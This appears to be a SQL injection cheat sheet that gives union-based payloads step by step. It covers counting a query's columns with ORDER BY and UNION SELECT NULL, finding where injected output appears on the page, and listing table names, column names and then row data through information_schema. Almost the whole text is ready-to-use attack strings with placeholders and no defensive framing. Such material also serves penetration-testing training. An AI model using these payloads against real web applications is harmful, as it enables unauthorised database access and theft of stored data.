Skip to content

Union-Based SQLi – Long Method

Enumerate Number of Columns

Method 1

Enumerate column 1
1 order by 1
Enumerate column 2
1 order by 2

Continue incrementing the order by value until an error is returned.

Method 2

Enumerate column 1
' order by 1-- -
Enumerate column 2
' order by 2-- -

Continue incrementing the order by value until an error is returned.

Method 3

Enumerate column 1
' UNION SELECT NULL--
Enumerate column 2
' UNION SELECT NULL,NULL--

Continue adding NULL placeholders until no error is returned.

Method 4

Enumerate column 1
<Legit Search>' order by 1-- -
Enumerate column 2
<Legit Search>' order by 1,2-- -

Continue adjusting the order by clause until no results are returned.

Find Where Information Appears on the Screen

Number injection
1 and 1=2 UNION SELECT 1,2,3,4-- -
String injection
' UNION SELECT 1,2,3,4-- -

Enumerate Table Names

Enumerate table_1

Method 1
1 and 1=2 UNION SELECT 1,2,3,table_name from information_schema.tables--
Method 2
' UNION SELECT table_name,2 from information_schema.tables--

Enumerate table_2

Enumerate table_2
' UNION SELECT 1,2,3,table_name from information_schema.tables where table_name not in ('<table_1>')--

Enumerate table_3

Enumerate table_3
' UNION SELECT 1,2,3,table_name from information_schema.tables where table_name not in ('<table_1>','<table_2>')--

Enumerate Column Names

Enumerate column_1 for table_1

Enumerate column_1 for table_1
' UNION SELECT column_name,2 from information_schema.columns where table_name='<table_1>'--

Enumerate column_2 for table_1

Enumerate column_2 for table_1
' UNION SELECT 1,2,3,column_name from information_schema.columns where table_name='<table_1>' and column_name not in ('<column_1>')--

Enumerate Data

Enumerate data_1 from column_1 of table_1

Enumerate data_1 from column_1 of table_1
' UNION SELECT 1,2,3,<column_1> from <table_1>--

Enumerate data_2 from column_1 of table_1

Enumerate data_2 from column_1 of table_1
' UNION SELECT 1,2,3,<column_1> from <table_1> where <column_1> not in ('<data_1>')--